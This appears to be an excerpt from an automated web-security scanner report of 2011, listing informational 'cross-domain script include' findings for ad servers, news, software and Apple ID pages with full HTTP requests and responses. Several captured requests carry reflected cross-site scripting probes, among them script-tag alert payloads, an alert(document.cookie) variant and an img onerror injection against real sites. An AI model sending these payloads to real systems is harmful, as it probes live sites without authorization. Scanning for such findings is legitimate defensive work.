From: abc05
X-Powered-By: ASP.NET
Set-Cookie: SWID=B93EDC68-F596-4509-B1FC-2C48F519C999; path=/; expires=Thu, 03-Feb-2031 20:31:23 GMT; domain=.go.com;
Content-Length: 7679
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>ABC
...[SNIP]...
</script>

<script type="text/javascript" src="http://a.abcnews.com/assets/js/smartphoneLoad.js"></script>
...[SNIP]...
<link rel="canonical" href="http://abcnews.go.com" />
<script language="javascript1.1" type="text/javascript" src="http://a.abcnews.com/assets/js/hbx-config.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="screen, print" href="http://a.abcnews.com/assets/css/baseindex.css" />

<script type="text/javascript" src="http://a.abcnews.com/assets/js/common.js"></script>

<script type="text/javascript" src="http://a.abcnews.com/assets/js/pane.js"></script>
<script type="text/javascript" src="http://a.abcnews.com/assets/js/playlist.js"></script>
<script type="text/javascript" src="http://a.abcnews.com/assets/js/animation.js"></script>
<script type="text/javascript" src="http://a.abcnews.com/assets/js/easing.js"></script>
<script type="text/javascript" src="http://a.abcnews.com/assets/js/tooltip.js"></script>

<script type="text/javascript" src="http://a.abcnews.com/assets/js/jquery/jquery-1.2.6.min.js"></script>
...[SNIP]...
<div class="window">
<script language="javascript" type="text/javascript" src="http://a.abcnews.com/assets/static/wrapper/header.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a.abcnews.com/assets/static/wrapper/footer.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://a.abcnews.com/assets/js/s_code.js"></script>
...[SNIP]...

19.3. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.TMP/B5159652.23

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC_3247**14288lsu2vxsy___3533310**0_3805*MXc_114**_-862839443;ord=5929963708858950656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 22:00:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6376

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 14 14:31:01 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

19.4. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.TMP/B5159652.24

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_3247**15stqp6ba7xf0___3533310**0_3805*MXc_114**_-862839443;ord=5575236558291927040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 21:59:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6367

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 14 13:59:07 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

19.5. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.4

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=628759578? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0054251952045395&output=html&h=90&slotname=7506363877&w=728&lmt=1296848235&flash=10.1.103&url=http%3A%2F%2Fwww.exploit-db.com%2Fvbseo-from-xss-to-reverse-php-shell%2F&dt=1296826635258&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7506363877&correlator=1296826635225&frm=0&adk=774897698&ga_vid=2124507869.1296826622&ga_sid=1296826622&ga_hid=277931053&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1017&bih=953&eid=30143102&fu=0&ifi=2&dtd=29&xpc=2r8iU0N2xu&p=http%3A//www.exploit-db.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4965
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 04 Feb 2011 17:54:50 GMT
Expires: Fri, 04 Feb 2011 17:54:50 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<!-- start DV tag-->
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57848002&advid=2179194&sid=973580&adid='></script>
...[SNIP]...

19.6. http://ad.doubleclick.net/adi/lb.buzzillions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/lb.buzzillions/;net=lb;u=,lb-1482036_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=3;sz=300x250;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 22:00:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5277

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,136 Template Name = #Flash -IBV & Produc
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

19.7. http://ad.doubleclick.net/adi/lb.buzzillions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 21:59:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 238

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://ad.trafficmp.com/a/js?plid=23663"></script>
...[SNIP]...

19.8. http://ad.doubleclick.net/adi/lb.buzzillions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 22:00:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 238

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://ad.trafficmp.com/a/js?plid=23659"></script>
...[SNIP]...

19.9. http://ad.doubleclick.net/adi/lb.buzzillions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/lb.buzzillions/;net=lb;u=,lb-82680071_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=3;sz=300x250;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 22:00:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 238

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://ad.trafficmp.com/a/js?plid=23661"></script>
...[SNIP]...

19.10. http://advertise.tucows.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: advertise.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.11. http://app.scanscout.com/ssframework/adStreamJSController.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.scanscout.com
Path:   /ssframework/adStreamJSController.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ssframework/adStreamJSController.htm?a=getadscheduleforcontent&format=vast&fetchads=preroll&ss_partnerId=626&ss_mediaId=v18978294NGnK88j8&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaCategories=&ss_mediaKeywords=&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_maxPrerollDuration=30&ss_width=480&ss_height=360&ss_asVersion=3&ss_mediaDescription=&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_acceptNonvideo=Y&jsa=Y HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:39:38 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: userCookie=2a3f421f33e5217b5b3498a1f9e65e25; Domain=.scanscout.com; Expires=Sun, 31-Jan-2021 21:39:38 GMT; Path=/
Set-Cookie: uniques=110203|626_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:39:38 GMT; Path=/
Set-Cookie: psh=626_1296769178181; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:39:38 GMT; Path=/
Set-Cookie: behavioralSegments=29_110203|32_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:39:38 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7533


<?xml version="1.0" encoding="UTF-8"?>
<VideoAdServingTemplate>
<Ad id="preroll-1">
<InLine>
<AdSystem>scanscout</AdSystem>
<AdTitle>5945286</AdTitle>
<Impression>
<
...[SNIP]...
doubleclick.net/adi/N5895.126578.TREMORMEDIA/B5140048.2;sz=300x250;ord=724671368?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5895.126578.TREMORMEDIA/B5140048.2;abr=!ie;sz=300x250;ord=724671368?">
</SCRIPT>
...[SNIP]...

19.12. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appleid.apple.com
Path:   /cgi-bin/WebObjects/MyAppleId.woa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cgi-bin/WebObjects/MyAppleId.woa?localang=en_US HTTP/1.1
Host: appleid.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:04:29 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7l
set-cookie: ISTLocale=ZW5fVVM%3D; version=1; expires=Fri, 03-Feb-2012 18:04:29 GMT; path=/
connection: close
content-length: 24701
MS-Author-Via: DAV
Content-Type: text/html; charset=UTF-8;

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


...[SNIP]...
</head>

   <script type="text/javascript" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/yui281/build/yahoo-dom-event/yahoo-dom-event.js"></script>
   <script type="text/javascript" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/yui281/build/animation/animation-min.js"></script>
   <script type="text/javascript" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/yui281/build/datasource/datasource-min.js"></script>
   <script type="text/javascript" src="https://a248.e.akamai.net/7/248/51/20100724/appleid.apple.com/yui281/build/autocomplete/autocomplete-min.js"></script>
...[SNIP]...

19.13. http://blog.supermedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: blog.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/social-responsibility/corporate-governance
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:38 GMT
Server: Unspecified
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:38 GMT;path=/
Cache-Control: private
Content-Length: 30628


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.14. http://blog.supermedia.com/2011/01/2011-changes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/2011-changes/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/2011-changes/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:18 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Changes to Look for in 2011 | SuperMedia Blog | SuperMedia.com</title>

<link rel="alternat
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.15. http://blog.supermedia.com/2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:26 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
